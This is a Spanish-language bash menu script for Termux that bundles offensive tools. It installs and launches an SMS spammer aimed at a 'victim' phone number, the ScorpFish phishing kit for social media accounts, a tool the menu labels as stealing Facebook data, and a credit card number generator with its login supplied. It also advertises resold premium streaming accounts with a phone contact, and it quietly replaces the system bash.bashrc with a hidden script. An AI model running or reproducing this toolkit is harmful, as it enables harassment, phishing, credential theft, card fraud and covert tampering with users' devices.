#!/bin/bash


rode="\e[31m"
ro="\e[1;31m"
ne="\e[30m"
gr="\e[1;30m"
azde="\e[34m"
az="\e[1;34m"
vede="\e[32m"
ve="\e[1;32m"
cede="\e[36m"
ce="\e[1;36m"
pude="\e[35m"
pu="\e[1;35m"
amde="\e[33m"
am="\e[1;33m"
grde="\e[37m"
bl="\e[1;37m"
re="\e[0m"


bgn="\033[40m"
bgr="\033[41m"
bgv="\033[42m"
bga="\033[43m"
bgaz="\033[44m"
bgm="\033[45m"
bgc="\033[46m"
bgb="\033[47m"

function bnw45 {
clear
printf "

 $bgr&&&&&&&&$re     $bgr&&&&$re     $bgr&&&&&&&&$re  $bgr&&&&&$re
 $bgr&&&$re         $bgr&&$re  $bgr&&$re       $bgr&&$re     $bgr&&$re   $bgr&&$re
 $bga!!!$re        $bga!!$re    $bga!!$re      $bga!!$re     $bga!!$re    $bga!!$re 
 $bga::::::::$re  $bga::$re      $bga::$re     $bga::$re     $bga::$re    $bga::$re
       $bgv;;$re  $bgv;;;;;;;;;;$re     $bgv;;$re     $bgv;;$re   $bgv;;$re
       $bgv..$re  $bgv..$re      $bgv..$re     $bgv..$re     $bgv..$re  $bgv..$re 
 $bgc........$re  $bgc..$re      $bgc..$re  $bgc........$re  $bgc.....$re 


$ro $bgc[1]$re $ve Spam con mensajes$re
$ro $bgc[2]$re $ve Instalacion de Metasploit$re
$ro $bgc[3]$re $ve Cuentas premium (Venta)$re
$ro $bgc[4]$re $ve Hacking de redes sociales$re
$ro $bgc[5]$re $ve Bot Atomatico de BTC (primero instale 10)$re
$ro $bgc[6]$re $ve Tmux-Viewer (ayuda personalizada) $re
$ro $bgc[7]$re $ve Grupos y canales$re
$ro $bgc[8]$re $ve datos de facebook (INSTALA)$re
$ro $bgc[9]$re $ve roba datos de facebook (instala primero, 8)$re
$ro $bgc[10]$re$ve Descarga bot para minar BTC$re
$ro $bgc[11]$re$ve Generador de cc (INSTALA) $re
$ro $bgc[12]$re$ve Usar Generador de cc (primero instale 11)$re
$ro $bgc[99]$re$ve Colocar menú como banner$re
"
} 


read -p "$ " opc

case $opc in
    99)
        cd; cd SG
        chmod 777 .exc.sh
        mv .exc.sh ../../usr/etc
        cd; cd ../usr/etc
        mv bash.bashrc $HOME/SG/.exc.sh
        mv .exc.sh bash.bashrc
        mv motd motd1
        ;;
    1)
        printf "
    $ro $bgc[a]$re $ve Instalar herramienta$re
    $ro $bgc[b]$re $ve ATACAR $gr(primero instalela)$re
        "
        echo
        printf "$ro"
        read -p "[a/b] >>  " opab
        printf "$re"
        case $opab in
            a)
        cd
        git clone https://github.com/Noxturnix/Spammer-Grab
        cd Spammer-Grab
        chmod +x auto-install.sh
        ./auto-install.sh
        printf "$am"
        read -p "tiempo entre cada mensaje:  " time
        printf "$re"
        echo
        echo
        printf "$vede Numero victima (codigo de pais + numero)
$ro No colocarle el signo  +  al principio del numero!$re"
        echo
        printf "$az"
        read -p "Numero :  " number
        printf "$re"
        python2 spammer.py --delay $time $number
        ;;
            b)
                cd
                cd Spammer-Grab
                printf "$am"
                read -p "tiempo entre cada mensaje:  " time
                echo
                            echo  
                printf "

$vede Nunero victima (codigo de pais + numero)                  
$rode No colocarle el signo  +  al principio del numero!$re"
                echo
                printf "$az"   
                read -p "Numero:  " number    
                printf "$re"
                python2 spammer.py --delay $time $number
                ;;
        esac
        ;;




    2)
        printf "
    $ro[-] Puede tardar hasta 30 minutos$re
    $ve[+] Iniciando proceso sin errores$re
        

        "
        sleep 4
        pkg update -y
        pkg upgrade -y
        clear
        printf "
        $am Instalando $ro |"
        sleep 1
        clear
        printf "
        $am iNstalando $ro /"
        sleep 1
        clear
        printf "
        $am inStalando $ro --"
        sleep 1
        clear
        printf "
        $am insTalando $ro \

        "
        sleep 1
        clear
        printf "
        $am instAlando $ro |"
        sleep 1
        clear
        printf "
        $am instaLando $ro /"
        sleep 1
        clear
        printf "
        $am instalAndo $ro --"
        sleep 1
        clear
        printf "
        $am instalaNdo $ro \

        "
        sleep 1
        clear
        printf "
        $am instalanDo $ro |"
        sleep 3
        clear
        printf "
        $ve------GO!------$re
        "
        sleep 3
        pkg install unstable-repo -y
        sleep 4
        sl
        sleep 2
        echo
        echo
        echo
        printf "
        $ro $bgb VAMOS! $re



        "
        pkg install metasploit -y
        ;;
    3)
        clear
        sl
        printf "

          💵💸 🇻​🇪​🇳​🇹​🇦​ 🇩​🇪 💸💵
          💵💸 🇨​🇺​🇪​🇳​🇹​🇦​🇸​  💸💵

$ro $bgc*_______ sᴇʀɪᴇs ʏ ᴘᴇʟíᴄᴜʟᴀs _______*$re
                                        
        
            💸$ro $bgb ᑎETᖴᒪI᙭ $re 💸             
        $az 1 Año $ro ~$ve  20 dólares
       $az 6 meses$ro  ~$ve  15 dólares

            💸$ro $bgb ᕼᗷO GO $re 💸
        $az 1 Año $ro ~$ve  15 dólares 
       $az 6 meses$ro  ~ $ve 10 dólares

         💸$ro $bgb ᖴO᙭ ᑭᖇEᗰIᑌᗰ $re 💸 
        $az 1 Año $ro ~$ve  15 dólares
       $az 6 meses$ro  ~ $ve 10 dólares

             💸$ro $bgb ᕼᑌᒪᑌ $re 💸 
        $az 1 Año$ro  ~$ve  10 dólares
       $az 6 meses$ro  ~$ve   6 dólares

        💸$ro $bgb YOᑌTᑌᗷE ᑭᖇEᗰIᑌᗰ $re 💸 
        $az 1 Año$ro  ~ $ve 20 dólares
       $az 6 meses$ro  ~$ve  15 dólares

             💸$ro $bgb ᗷᒪIᗰ $re 💸 
        $az 1 Año$ro  ~ $ve 15 dólares
       $az 6 meses$ro  ~$ve  10 dólares

         💸$ro $bgb ᖴᒪOᗯ ᗩᖇGEᑎTIᑎᗩ $re 💸 
        $az 1 Año $ro ~ $ve 20 dólares

          💸$ro $bgb ᑭᖇIᗰE ᐯIᗪEO $re 💸 
        $az 1 Año$ro  ~$ve  10 dólares
       $az 6 meses$ro  ~$ve   7 dólares

           💸$ro $bgb ᐯIKI ᑭASS $re 💸 
        $az 1 Año $ro ~$ve  15 dólares
       $az 6 meses $ro ~$ve  12 dólares


$ro $bgc*______________ᴍúsɪᴄᴀ______________*$re
 
            💸$ro $bgb SᑭOTIᖴY $re 💸
        $az 1 Año$ro  ~$ve  10 dólares
       $az 6 meses $ro ~ $ve  7 dólares

         💸$ro $bgb TIᗪᗩᒪ ᑭᖇEᗰIᑌᗰ $re 💸
        $az 1 Año$ro  ~$ve  10 dólares
       $az 6 meses $ro ~$ve   6 dólares

        💸$ro $bgb YOᑌTᑌᗷE ᑭᖇEᗰIᑌᗰ $re 💸
        $az 1 Año$ro  ~$ve  20 dólares
       $az 6 meses$ro  ~ $ve 15 dólares 

         💸$ro $bgb ᗪEEᘔEᖇ ᑭᖇEᗰIᑌᗰ $re 💸
        $az 1 Año$ro  ~$ve  15 dólares
       $az 6 meses$ro  ~$ve  10 dólares


$ro $bgc*____________ ᴅᴇᴘᴏʀᴛᴇs ____________*$re

        💸$ro $bgb ᑌᖴᑕ ᖴIGᕼT ᑭᗩSS $re 💸
        $az 1 Año$ro  ~$ve  12 dólares
       $az 6 meses$ro  ~$ve   7 dólares

         💸$ro $bgb ᗯᗯE ᑭᖇEᗰIᑌᗰ $re 💸
        $az 1 Año$ro  ~$ve  5 dólares
  
           💸$ro $bgb ᑎᗷᗩ ᑭᗩSS $re 💸
        $az 1 Año$ro  ~ $ve 30 dólares
       $az 6 meses$ro  ~$ve  20 dólares

           💸$ro $bgb ᑎᖴᒪ ᑭᗩSS $re 💸
        $az 1 año$ro  ~$ve  30 dólares
       $az 6 meses$ro  ~$ve  20 dólares

            💸$ro $bgb ᗩT ᗷᗩT $re 💸
        $az 1 Año$ro  ~ $ve 25 dólares
       $az 6 meses$ro  ~$ve  18 dólares


$ro $bgc*_____________ ᴊᴜᴇɢᴏs _____________*$re
 
         💸$ro $bgb OᖇIGIᑎ GᗩᗰES $re 💸
             $ve 15 dolares

         💸$ro $bgb ᖇOᗷᒪO᙭ ᖇOᗷᑌ᙭ $re 💸
         $ve A mitad de precio


$ro $bgc*_______ sᴛʀᴇᴀᴍɪɴɢ ᴅᴇ ᴀɴɪᴍᴇ _______*$re

         💸$ro $bgb ᑕᖇᑌᑎᑕᕼYᖇOᒪᒪ $re 💸
        $az 1 año$ro  ~$ve  6 dólares 
       $az 6 meses$ro  ~ $ve 4 dólares


$ro $bgc*____________ ᴛᴠ ᴏɴʟɪɴᴇ ___________*$re

          💸$ro $bgb STᗩᖇᕼᑌᗷ GO $re 💸
        $az 1 Año $ro ~$ve  20 dólares 
        $az 6 meses$ro  ~$ve  15 dólares


$ro $bgc*_____ᴅɪsᴇñᴏ ʏ ᴇᴅɪᴄɪóɴ ᴏɴʟɪɴᴇ______*$re

            💸$ro $bgb ᑕᗩᑎᐯᗩ $re 💸
        $az 1 Año$ro  ~ $ve 15 dólares
       $az 6 meses$ro  ~$ve  12 dólares

$ro $bgc*___ᴀᴘʀᴇɴᴅɪᴢᴀᴊᴇ ᴅᴇ ɪᴅɪᴏᴍᴀs ᴏɴʟɪɴᴇ__*$re

         💸$ro $bgb ᗷᗩᗷᗷEᒪ IᗪIOᗰᗩS $re 💸
         $az 1 Año$ro  ~$ve  20 dólares 
        $az 6 meses$ro  ~ $ve 15 dólares


$ro $bgc*__________ ᴀᴜᴅɪᴏ ʟɪʙʀᴏs __________*$re

            💸$ro $bgb SᑕᖇIᗷᗪ $re 💸 
        $az 1 Año$ro  ~$ve  15 dólares
       $az 6 meses$ro  ~$ve  10 dólares


$ro $bgc*____ᴀʟᴍᴀᴄᴇɴᴀᴍɪᴇɴᴛᴏ ᴇɴ ʟᴀ ɴᴜʙᴇ_____*$re

         💸$ro $bgb ᗪᖇOᑭᗷO᙭ ᑎᑌᗷE $re 💸
        $az 1 Año$ro  ~$ve  15 dólares 
       $az 6 meses$ro  ~$ve   8 dólares


$ro $bgc*_________sᴇʀᴠɪᴄɪᴏs ᴅᴇ ᴠᴘɴ_________*$re

           💸$ro $bgb ᑎOᖇᗪ ᐯᑭᑎ $re 💸
        $az 1 Año$ro  ~$ve  10 dólares
       $az 6 meses$ro  ~ $ve  5 dólares

          💸$ro $bgb ᕼᗰᗩ ᑭᖇO ᐯᑭᑎ $re 💸
        $az 1 Año$ro  ~$ve  12 dólares 
       $az 6 meses$ro  ~$ve   8 dólares 

     💸$ro $bgb OTᖇO SEᖇᐯIᑕIO ᗪE ᐯᑭᑎ $re 💸
        $az 1 Año$ro  ~$ve  10 dólares
       $az 6 meses$ro  ~$ve   5 dólares


$ro $bgc*____________ᴀɴᴛɪᴠɪʀᴜs_____________*$re

       💸$ro $bgb ᗩᐯᗩST ᗩᑎTIᐯIᖇᑌS $re 💸
        $az 1 Año$ro  ~$ve  30 dólares
       $az 6 meses $ro ~$ve  20 dólares$re



            🇵​🇦​🇬​🇴​🇸​ 🇵​🇦​🇾​🇦​🇵​🇱​
      $am ᴄᴏɴᴛᴀᴄᴛᴏ +506 61552366$re
      "
      ;;
4)
    printf "
    $ro $bgc[a]$re $ve Instalar herramienta$re
    $ro $bgc[b]$re $ve ATACAR $gr(primero instalela)$re"
    echo
    read -p ">>  " opfe
    case $opfe in
        a)
            cd
            apt update -y
            apt upgrade -y
            apt install git
            git clone https://github.com/error404-notfound/ScorpFish.git
            apt install php
            apt install openssh
            apt install curl
            cd
            cd ScorpFish
            chmod +x *
            printf "
$ve LISTO! $am Ejecuta de nuevo el scrip
y elige la opcion$ro b$am para atacar...$re

"
            ;;
        b)

            cd
            cd ScorpFish
            ./ScorpFish.sh
            ;;
    esac
    ;;


5)

    printf "$az"
    read -p "Numero :   " num
    echo
    echo
    printf "$e cuantos minutos espero entre cada intento ?"
    echo
    printf "$vede"
    read -p "Tiempo (en minutos)   >> " timepi
    timepienseg=$(( $timepi*60 ))
    printf "$re"
    function inc {
        cd
        cd Mb
        python btc.py $num
        cd
        clear
    printf "
$ce Esperando $timepi minutos para reintentar"
    sleep $timepienseg
        inc
    }
    inc
    ;;
10)
    cd
    pkg update -y
    pkg upgrade -y
    pkg install python
    pip install --upgrade pip
    termux-setup-storage
    cd
    git clone https://github.com/SaidGR/Mb.git
    cd Mb
    unzip 'MULTIBOT (SFILE.MOBI).zip'
    rm -Rf 'MULTIBOT (SFILE.MOBI).zip'
    cd session
    rm -Rf +6281360080100.session
    rm -Rf +6285217779420.session
    rm -Rf +6285348006188.session
    rm -Rf +6285358669922.session
    cd
    cd Mb
    pip install -r requirements.txt
    cd
    clear
    printf "
$ro $bgb LISTO, EJECUTA AHORA said_610 PARA EMPEZAR A MINAR AHORA $re "
    said
    ;;

6)
    printf "                                      
$ro $bgc[a]$re $ve Instalacion$re
$ro $bgc[b]$re $ve Utilizar...$re"
    echo
    echo
    read -p "[a/b]  > " opcinu
    case $opcinu in
        a)
            cd
            cd SG
            git clone https://github.com/SaidGR/bwnzq12
            cd bwnzq12
            mv tmux-viewer $HOME
            cd
            chmod 777 tmux-viewer
            cd SG
            rm -Rf bwnzq12
            cd
            printf "
$ve Listo, ahora ejecuta le letra $am b $ve cada vez que quieras usar la herramienta$re"
            echo
            echo
            ;;
        b)
            cd
            clear
            printf "
$am ¿Tu dispositivo es de 32 o 64 bits? $re

$ro $bgc[a]$re $ve 32 bits
$ro $bgc[b]$re $ve 64 bits"
            echo
            echo
            read -p "[a/b]  " opc3264
            case $opc3264 in
                a)
                    clear
                    printf "
$ro Recuerda; $vede A continuacion debes escribir una contrasela de 4 letras... y debes volverla a escribir si te piden confirmarla $re                                                                                                                         Seguidamente, se te limpiara la pantall, y aparecera una linea amarilla abajo, ahi debes volver a escribir la frase             
$ce DESPUES DE UNOS 3 SEGUNDOS DE HABER PUESTO LA CONTRASELA EN
ESA LINEA AMARILLA.... TE SALDRA UN CODIGO LARGO DE LETRAS MAYUSCULAS Y MINUSCULAS,  ESE CODIGO ES EL QUE DEBES DE COPIAR                                                                       $ro NOTA;  ESE CODIGO SE QUITA RAPIDO, ASI QUE DEBES COPIARLO RAPIDAMENTE ANTES DE QUE SE QUITE$re

$ce PRECIONA ENTER PARA CONTINUAR"
                    read
                    cd
                    ./tmux-viewer
                    ;;
                b)
                    clear
                    printf "
$ro Recuerda; $vede A continuacion debes escribir una contrasela de 4 letras... y debes volverla a escribir si te piden confirmarla $re

seguidamente, se te limpiara la pantall, y aparecera una linea amarilla abajo, ahi debes volver a escribir la frase             

$ce DESPUES DE UNOS 3 SEGUNDOS DE HABER PUESTO LA CONTRASELA EN ESA LINEA AMARILLA.... TE SALDRA UN CODIGO LARGO DE LETRAS MAYUSCULAS Y MINUSCULAS,  ESE CODIGO ES EL QUE DEBES DE COPIAR

$ro NOTA;  ESE CODIGO SE QUITA RAPIDO, ASI QUE DEBES COPIARLO RAPIDAMENTE ANTES DE QUE SE QUITE$re

$ce PRECIONA ENTER PARA CONTINUAR $re"
                    
                    read
                    cd
                    unset LD_PRELOAD
                    ./tmux-viewer
                    ;;

            esac
            ;;
    esac
    ;;
7)
        printf "
$ro $bgc[1]$re $ve Grupo de Whatsapp$re
$ro $bgc[2]$re $ve Grupo de Telegram$re" 
        read -p ">> " ele12tw
        case $ele12tw in
             1)
                  termux-open https://chat.whatsapp.com/JH8RHcNM7R2Arz0NWJiloI
                  ;;
             2)
                  termux-open https://t.me/joinchat/L48AMwuXwHCNaAQJcqEnXg
                  ;;
        esac
        ;;
11)
    cd
    pkg install python2 -y
    pkg install toilet -y
    pip2 install termcolor -y
    pip2 install -y
    lolcat 
    pkg install php -y
    pkg install readline -y
    pkg install git -y
    git clone https://github.com/DarknessCyberTeam/BAJINGANv6
    cd
    cd BAJINGANv6
    chmod +x BAJINGAN.sh
    clear
    printf "
$ve [+]$az Abriendo sistema de datos"
    sleep 6
    echo
    echo
    printf "
$ro Datos que necesitaras dentro del sistema$re

$am username:$re  BAJINGAN
$am password:$re  Gans
    

Luego de colocar el usuario y contraseña seleccionan el numero $ro 9$re y le dan continuar, Luego el numero de cc que quieren generar y luego un numero al azar, (cualquiera)"
    echo
    echo
    read -p "Peciona Enter para continuar >>"
    sh BAJINGAN.sh
    ;;
12)
    cd
    cd BAJINGANv6
    clear
    printf "
$ro Datos que necesitaras dentro del sistema$re

$am username:$re  BAJINGAN
$am password:$re  Gans                                          

Luego de colocar el usuario y contraseña seleccionan el numero $ro 9$re y le dan continuar, Luego el numero de cc que quieren generar y luego un numero al azar, (cualquiera)"
    echo
    echo
    read -p "Preciona Enter para continuar >>"
    sh BAJINGAN.sh
    ;;
8)
    cd
    pkg update -y
    pkg upgrade -y
    pkg install python2 -y
    pkg install git
    cd
    git clone https://github.com/CiKu370/OSIF
    cd OSIF
    pip2 install -r requirements.txt
    pip2 install requests
    clear
    printf "
$ce A continuacion coloca el comando token... y seguido colocaremos nuestro usuario y contraseña de facebook $re

$am Esto solo lo debes hacer una vez $re




"
    python2 osif.py
    clear
    printf "
$ce Colocamos el comando$ro help$ce y nos dara la lista de opciones que tenemos para probar...$re 

$am Si quieres volver a ejecutarlo solo coloca el comando:

$ro said_493 $re 




"
    python2 osif.py
    ;;
9)
    cd
    cd OSIF
    python2 osif.py
    ;;
said_cuentas)
    cd
    cd SG
    chmod 777 .raiz_termux.sh
    ./.raiz_termux.sh
    ;;
base) 
    cd
    ;;

esac
